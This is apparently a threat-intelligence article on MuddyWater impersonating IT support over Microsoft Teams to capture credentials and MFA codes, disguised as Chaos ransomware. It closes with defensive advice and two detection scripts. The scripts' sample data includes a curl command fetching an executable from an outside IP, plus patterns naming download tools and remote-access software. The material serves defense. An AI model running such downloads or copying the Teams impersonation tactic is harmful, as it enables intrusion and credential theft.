MuddyWater Uses Microsoft Teams to Steal Creds in False Flag


Imagine getting a message on Microsoft Teams from someone who appears to be your company’s IT support. They claim to need your credentials to fix a pressing security issue. It sounds routine. It happens every day in offices around the world. But in early 2026, this exact scenario became the opening move in a highly targeted cyberattack orchestrated by an Iranian state-sponsored group. The attack, which leveraged social engineering through Microsoft Teams, was not what it seemed on the surface. It was a false flag operation designed to steal credentials, bypass multi-factor authentication, and leave behind a long-term foothold in the victim’s network. Security firm Rapid7 observed and documented the entire sequence, revealing a sophisticated campaign that blurs the line between cybercrime and state-sponsored espionage. The group behind it is MuddyWater, and their use of Microsoft Teams as an attack vector marks a significant evolution in their tactics.


The Anatomy of a MuddyWater Microsoft Teams Attack

The attack chain begins with something deceptively simple: an unsolicited chat request on Microsoft Teams. The threat actor reaches out to an employee, posing as an internal IT support representative. The message is urgent. It claims the employee’s account has been compromised or that a critical security patch needs to be applied. The goal is to create a sense of panic and compliance.

Once the employee engages, the attacker requests screen-sharing access. This is the pivotal moment. With screen-sharing enabled, the attacker can observe the employee’s desktop in real time. They ask the employee to open specific configuration files, navigate to VPN portals, or type credentials into notepad documents. The attacker watches everything. They capture passwords, usernames, and MFA tokens as they appear on screen.

How MFA Gets Bypassed

Multi-factor authentication is supposed to be a strong defense. But in this scenario, the attacker circumvents it by observing the MFA prompt directly on the victim’s screen. When a push notification or one-time code appears, the attacker sees it and uses it immediately. This renders MFA nearly useless against a live screen-sharing session where the attacker controls the narrative.

In one documented instance, the attacker directed the victim to enter credentials into a locally created text file. This gave the attacker a clean copy of the login details. With those credentials and the MFA token in hand, the attacker could authenticate as the victim from their own machine, often without raising any alarms.

False Flag: MuddyWater Poses as Chaos Ransomware

What makes this campaign particularly deceptive is the false flag element. On the surface, the attack looked like a typical ransomware incident involving the Chaos RaaS group. Chaos is a known ransomware-as-a-service operation that emerged in early 2025. It uses double extortion, threatens DDoS attacks, and even employs quadruple extortion by contacting victims’ customers or competitors. It is a criminal enterprise through and through.

But the Rapid7 analysis revealed something different. The attackers did not encrypt files. They exfiltrated data. They installed remote management tools like DWAgent and AnyDesk for long-term persistence. They moved laterally through the network, conducting reconnaissance rather than demanding a ransom. The infection chain delivered a multi-stage payload via a binary called ‘ms_upd.exe’, downloaded using curl from an external server. This was not the work of a profit-driven ransomware gang. It was a state-backed intelligence gathering operation wearing a criminal mask.

By mimicking Chaos ransomware, MuddyWater achieves two things. First, they muddy attribution. Security researchers and incident responders may spend valuable time chasing a criminal group when the real adversary is a nation-state. Second, they gain operational cover. If the attack fails or is detected, the victim may assume it was random cybercrime rather than a targeted intrusion by Iran.

A Brief History of MuddyWater’s Ransomware Masquerades

This is not the first time MuddyWater has borrowed the clothes of a ransomware gang. The group has a documented history of using ransomware as a cover for destructive and espionage-focused operations. Understanding this pattern is essential for defenders who want to distinguish between criminal extortion and state-backed intrusion.

September 2020: Thanos Ransomware via PowGoop

In September 2020, MuddyWater targeted prominent Israeli organizations using a loader called PowGoop. This malware deployed a variant of Thanos ransomware. But the attack was not primarily about financial gain. The destructive capabilities suggested a strategic objective aligned with Iranian interests. The ransomware element served as both a distraction and a means of disruption.

2023: DarkBit and DEV-1084 Collaboration

In 2023, Microsoft disclosed that MuddyWater had teamed up with a threat actor known as DEV-1084, which operated under the DarkBit persona. Together, they conducted destructive attacks under the pretense of deploying ransomware. Again, the extortion element was a facade. The real goal was to cause damage and sow confusion about who was responsible.

October 2025: Qilin Ransomware Against an Israeli Hospital

As recently as October 2025, MuddyWater is believed to have used Qilin ransomware to target an Israeli government hospital. Check Point noted that the attackers were likely Iranian-affiliated operators using a criminal ransomware brand while serving a strategic Iranian objective. The use of Qilin provided cover and plausible deniability. It also allowed the attackers to operate within the cybercrime ecosystem, leveraging affiliate programs and extortion infrastructure that would normally be associated with criminal groups.

The Chaos RaaS Ecosystem: A Closer Look

To understand why MuddyWater chose to impersonate Chaos, it helps to know what Chaos actually is. Chaos is a ransomware-as-a-service group that emerged in early 2025. It is known for aggressive extortion tactics that go well beyond simple encryption.

Chaos advertisements appear on cybercrime forums like RAMP and RehubCom. The group recruits affiliates who can carry out attacks in exchange for a cut of the ransom payments. Chaos provides a full toolkit, including initial access methods, encryption payloads, and negotiation support. This makes it an attractive brand for threat actors who want to operate at scale without building their own infrastructure.

From Double to Quadruple Extortion

Chaos started with a double extortion model: encrypt files and threaten to leak stolen data. Then they added triple extortion by threatening distributed denial-of-service attacks against the victim’s infrastructure. More recently, they have been observed using quadruple extortion, which includes contacting the victim’s customers, partners, or competitors to increase pressure. This escalation of tactics makes Chaos one of the more aggressive RaaS groups currently active.

As of late March 2026, Chaos had claimed 36 victims on its data leak site. The majority of these victims were in the United States, with construction, manufacturing, and business services being the most targeted sectors. The group’s operational tempo and public bravado make them an ideal cover for a state-backed actor like MuddyWater. When Chaos claims credit for an attack, few question whether the real perpetrator might be a nation-state.

How MuddyWater’s True Intentions Differ from Chaos

The intrusion analyzed by Rapid7 revealed several behaviors that distinguish MuddyWater from a typical Chaos affiliate. Understanding these differences can help incident responders recognize a false flag operation early in the investigation.

First, the attackers did not deploy ransomware. They exfiltrated data and left behind remote management tools like DWAgent and AnyDesk. A ransomware attack that does not encrypt files is a red flag. Second, the attackers used interactive screen-sharing via Microsoft Teams to harvest credentials and manipulate MFA. This high-touch social engineering phase is uncommon in low-sophistication ransomware attacks, which often rely on phishing emails or vulnerability exploitation.

Third, the attackers established long-term persistence. They installed backdoors and maintained access for extended periods. A criminal ransomware group typically wants to execute the ransomware, collect the ransom, and move on. They do not invest in maintaining a hidden presence inside the network. Fourth, the attackers engaged in detailed reconnaissance. They ran discovery commands, accessed VPN configuration files, and mapped the internal network. This level of intelligence gathering aligns with espionage, not extortion.


Finally, the threat actor contacted the victim via email for ransom negotiations, but the negotiation itself appeared to be a diversion. The attackers were not primarily interested in payment. They were interested in maintaining access and collecting intelligence.

Practical Defenses Against MuddyWater Microsoft Teams Attacks

Organizations can take concrete steps to defend against this type of attack. The following measures are designed to reduce the risk of social engineering via collaboration platforms and to detect false flag operations early.

Strengthen Identity Verification for IT Support Requests

Employees should be trained to verify IT support requests through a secondary channel. If someone contacts them via Teams claiming to be from IT, they should call the IT department directly using a known phone number. They should never trust the caller ID or profile picture in the chat. Attackers can easily spoof these details.

Restrict Screen-Sharing to Trusted Sessions Only

Organizations should configure Microsoft Teams to disable screen-sharing for external chat requests by default. Screen-sharing should only be possible after the identity of the participant has been verified. This simple policy change can stop the attack before it begins.

Implement MFA Resistant to Real-Time Bypass

Traditional MFA methods like push notifications and one-time codes are vulnerable when an attacker can see the victim’s screen. Organizations should adopt phishing-resistant MFA, such as FIDO2 security keys or certificate-based authentication. These methods require physical possession of a device and cannot be observed on a screen.

Additionally, organizations should monitor for anomalous MFA acceptance patterns. If a single user approves multiple MFA prompts in rapid succession from different geographic locations, this could indicate a live session takeover.
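The detection described above, as an added example that is not part of the original article or of Rapid7's write-up: a small Python script that reads constructed sign-in log lines and flags any user whose approved MFA prompts inside a ten-minute window came from two or more countries. The JSON-per-line format and the field names (ts, user, mfa_result, country, ip) are assumptions made for the example, not any identity provider's real schema; the log lines and IP addresses are constructed sample data.

```python
"""Flag MFA approval bursts from different locations (added example)."""
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample sign-in events (not real data). The two "carol" lines at
# 09:20 and 09:21 show the pattern of interest: two approvals 90 seconds apart
# from two different countries, consistent with a live session takeover.
SAMPLE_LOG = """
{"ts": "2026-03-02T09:14:03Z", "user": "alice", "mfa_result": "approved", "country": "US", "ip": "203.0.113.10"}
{"ts": "2026-03-02T09:14:40Z", "user": "bob", "mfa_result": "approved", "country": "US", "ip": "203.0.113.11"}
{"ts": "2026-03-02T09:20:05Z", "user": "carol", "mfa_result": "approved", "country": "US", "ip": "203.0.113.12"}
{"ts": "2026-03-02T09:21:35Z", "user": "carol", "mfa_result": "approved", "country": "NL", "ip": "198.51.100.7"}
{"ts": "2026-03-02T09:30:00Z", "user": "bob", "mfa_result": "denied", "country": "DE", "ip": "198.51.100.9"}
{"ts": "2026-03-02T11:00:00Z", "user": "carol", "mfa_result": "approved", "country": "US", "ip": "203.0.113.12"}
"""

WINDOW = timedelta(minutes=10)  # tuning knob; 10 minutes is an assumed default


def parse_events(text):
    """Parse JSON-per-line sign-in records and return them sorted by time."""
    events = []
    for line in text.strip().splitlines():
        rec = json.loads(line)
        rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(rec)
    return sorted(events, key=lambda r: r["ts"])


def find_mfa_bursts(events, window=WINDOW):
    """Return one alert per user who approved two or more MFA prompts inside
    `window` from at least two distinct countries. Denied prompts are ignored:
    the signal is successful approvals, which is what a watching attacker
    obtains from the victim's screen."""
    approved = defaultdict(list)
    for e in events:
        if e["mfa_result"] == "approved":
            approved[e["user"]].append(e)

    alerts = []
    for user, evs in approved.items():
        start = 0
        # Sliding window over the user's time-ordered approvals.
        for end in range(len(evs)):
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            span = evs[start:end + 1]
            countries = {e["country"] for e in span}
            if len(span) >= 2 and len(countries) >= 2:
                alerts.append({
                    "user": user,
                    "first": span[0]["ts"],
                    "last": span[-1]["ts"],
                    "countries": sorted(countries),
                    "ips": sorted({e["ip"] for e in span}),
                })
                break  # one alert per user is enough for triage
    return alerts


if __name__ == "__main__":
    for alert in find_mfa_bursts(parse_events(SAMPLE_LOG)):
        print(f"ALERT {alert['user']}: {len(alert['ips'])} approvals from "
              f"{alert['countries']} between {alert['first']} and {alert['last']}")
```

The country field is the coarse signal the article calls out; on real sign-in data a tighter rule would also compare the device or session identifiers behind each approval, since an attacker replaying a captured one-time code from their own machine produces a second session even when the geolocation happens to match.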

Monitor for Unauthorized Remote Management Tools

The MuddyWater attack relied on tools like DWAgent and AnyDesk for persistence. Security teams should maintain an inventory of authorized remote management tools and monitor for installations of new or unauthorized tools. Endpoint detection and response systems can be configured to alert on the installation of these specific applications.
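An added example of the inventory-and-alert approach described above, written for this page and not taken from the article or from any EDR vendor: it evaluates constructed endpoint process-creation events against a list of known remote-management binaries and a per-host-group allowlist, and also flags the download-an-executable pattern the article attributes to the intrusion (curl fetching ms_upd.exe). DWAgent and AnyDesk are the tools the article names; the other product entries, the host groups, the allowlist, the event fields (host, group, user, image, cmdline) and all sample hosts, users and addresses are assumptions constructed for the example.

```python
"""Flag unauthorized RMM tools and executable downloads in process events (added example)."""
import re

# Known remote-management binaries to watch for. DWAgent and AnyDesk come from
# the incident write-up; the other entries are common RMM products added here
# as examples. Keys are lower-cased image file names.
RMM_IMAGES = {
    "anydesk.exe": "AnyDesk",
    "dwagent.exe": "DWAgent",
    "dwagsvc.exe": "DWAgent",
    "teamviewer.exe": "TeamViewer",
    "screenconnect.clientservice.exe": "ScreenConnect",
}

# Which RMM product each host group is authorized to run. These groups and the
# single authorized product are assumptions for the example.
AUTHORIZED = {
    "helpdesk-workstation": {"TeamViewer"},
    "server": set(),
    "workstation": set(),
}

# Command lines where a fetch utility pulls an executable from a remote host.
DOWNLOAD_RE = re.compile(
    r"\b(curl|wget|certutil|bitsadmin)\b.*https?://\S+\.(exe|dll|msi)\b", re.I)

# Constructed sample process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"host": "WS-0412", "group": "workstation", "user": "corp\\carol",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl -o ms_upd.exe http://198.51.100.7/ms_upd.exe"},
    {"host": "WS-0412", "group": "workstation", "user": "corp\\carol",
     "image": r"C:\Users\carol\AppData\Roaming\AnyDesk\AnyDesk.exe",
     "cmdline": "AnyDesk.exe --install"},
    {"host": "HD-07", "group": "helpdesk-workstation", "user": "corp\\itops",
     "image": r"C:\Program Files\TeamViewer\TeamViewer.exe",
     "cmdline": "TeamViewer.exe"},
    {"host": "SRV-VPN1", "group": "server", "user": "corp\\svc-backup",
     "image": r"C:\Program Files\DWAgent\runtime\dwagsvc.exe",
     "cmdline": "dwagsvc.exe run"},
    {"host": "WS-0200", "group": "workstation", "user": "corp\\dave",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe creds.txt"},
]


def image_name(path):
    """Return the lower-cased file name of a Windows or POSIX image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return a list of (rule, detail) findings for one process event."""
    findings = []
    name = image_name(event["image"])
    product = RMM_IMAGES.get(name)
    allowed = AUTHORIZED.get(event["group"], set())
    if product and product not in allowed:
        findings.append(("unauthorized_rmm",
                         f"{product} on {event['host']} ({event['group']}) "
                         f"started by {event['user']}"))
    if DOWNLOAD_RE.search(event["cmdline"]):
        findings.append(("executable_download",
                         f"{name} fetched an executable on {event['host']}: "
                         f"{event['cmdline']}"))
    return findings


def scan(events):
    """Evaluate every event and flatten the findings to (host, rule, detail)."""
    return [(e["host"], rule, detail)
            for e in events for rule, detail in evaluate(e)]


if __name__ == "__main__":
    for host, rule, detail in scan(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```

Matching on the image file name is deliberately the simplest rule; in production the same allowlist check should also key on the binary's signer or hash, because a renamed AnyDesk client would slip past a name-only rule while its code signature would not.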

Train Employees to Recognize High-Pressure Social Engineering

Employees are the first line of defense. They should be trained to recognize signs of social engineering, including urgency, requests for credentials, and requests for screen-sharing from unknown contacts. Regular phishing simulations that include Teams-based scenarios can help reinforce this training.

Deploy Network Segmentation for Critical Systems

The attackers in this campaign used compromised credentials to move laterally and access VPN configuration files. Network segmentation can limit this lateral movement. Critical systems, including domain controllers and VPN servers, should be isolated in separate network segments with strict access controls.

The Broader Implication of False Flag Operations

The MuddyWater false flag campaign represents a growing trend in cyber operations. State-sponsored groups are increasingly adopting the tools, tactics, and brands of criminal ransomware groups. This convergence creates significant challenges for attribution and incident response.

When a security team investigates a ransomware incident, they typically follow the money. They look for ransom notes, extortion portals, and cryptocurrency wallets. But in a false flag operation, these artifacts are deliberately planted to mislead. The real objective may be espionage, data theft, or destructive sabotage. Incident responders must learn to look beyond the surface indicators and examine behaviors like persistence, reconnaissance, and data exfiltration patterns.

This blurring of lines also creates a strategic dilemma for governments and law enforcement. Criminal ransomware groups are already difficult to prosecute due to jurisdictional issues. State-backed actors operating under criminal cover add another layer of complexity. Should a ransomware attack be treated as a crime or as an act of state-sponsored aggression? The answer depends on accurately identifying the true perpetrator, which is exactly what false flags are designed to prevent.

The MuddyWater case is a stark reminder that not every ransomware attack is what it appears to be. The presence of Chaos branding, a ransom note, and a data leak site does not automatically mean the attack was criminal in nature. Security teams must be prepared to investigate with a broader lens, looking for signs of state-backed tradecraft hidden beneath the criminal facade.

